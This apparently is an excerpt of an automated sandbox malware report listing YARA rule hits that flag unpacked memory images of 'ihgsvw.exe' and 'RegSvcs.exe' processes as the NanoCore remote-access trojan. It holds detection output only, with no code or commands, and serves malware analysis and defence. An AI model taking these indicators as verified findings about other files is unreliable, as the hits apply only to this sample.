      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
